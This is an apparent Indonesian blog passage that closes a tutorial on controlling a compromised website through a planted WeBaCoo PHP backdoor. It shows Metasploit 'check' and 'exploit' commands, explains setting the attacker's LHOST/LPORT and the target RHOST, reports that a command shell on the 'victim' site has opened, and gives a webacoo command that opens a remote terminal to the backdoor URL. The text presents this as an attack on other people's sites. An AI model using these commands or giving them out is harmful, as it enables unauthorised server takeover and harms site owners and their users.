msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan 


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban 
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:

# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor


Postingan Lebih Baru Postingan Lama Beranda